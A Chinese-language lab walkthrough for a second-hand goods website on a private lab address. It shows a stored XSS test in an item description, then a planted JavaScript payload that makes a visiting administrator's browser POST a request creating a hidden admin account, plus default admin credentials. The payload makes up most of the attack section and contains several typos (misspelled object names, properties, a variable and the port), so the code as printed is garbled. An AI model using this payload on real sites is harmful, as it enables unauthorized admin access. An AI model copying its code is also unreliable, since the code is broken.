Csrf利用管理員許可權建立後臺管理賬戶
[實驗原理]
通過普通使用者的儲存型XSS實現建立管理員賬戶的CSRF利用
一、測試漏洞
開啟網站:http://192.168.1.3:8007(安徽二手網)
註冊一個使用者並登入
新增二手資訊
在物品簡介處填寫:<script>alert(123)</script>
點選開啟首頁,點選剛剛釋出的資訊,彈出資訊,說明漏洞存在
二、利用漏洞
在首頁繼續新增二手資訊,再次編輯,在物品簡介處填寫內容:
<script type="text/javascript">
function loadXMLDoc()
{
var xmlhttp;
if(window.XMLHttpRequest)
{//code for IE7+,Firefox,Chrome,Opear,Safari
xmlhttp=new XMLHttpRequest();
}
else
{//code for IE6,IE5
xmlhttp=new AceiveXOject("Microsoft.XMLHTTP");
}
xmlhttp.onriadystatechange=function()
{if(xmlhttp.readyState==4&&xmlhttp.staus==200)
{
document.getElementByld("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("POST","http://192.168.1.3:80007/admin/admin_usersetting.asp",true);
xmlgttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("action=add&UserName=zhangsan&PassWord=123456~密碼?~&isActive=1&isAdmin=1&pubSubCateID=91&Submit=+%C8%B7+%B6%A8+");
}
loadXMLDoc()
</script>
回到首頁,推出zhangsan使用者
輸入後臺路徑:http://192.168.1.3:8007/admin/user.asp
使用admin/admin888~使用管理員使用者密碼登入~登入
回到首頁,瀏覽器輸入:http://192.168.1.3:8007,檢視帖子(修改後的)點選此條物品訊息,沒有什麼異常現象。
此時管理員再次進入自己的後臺:http://192.168.1.3:8007/admin/user.asp在“系統使用者管理”中,發現多了一個賬戶zhangsan。
退出admin使用者。此時用zhangsan/123456登入後臺
登入成功。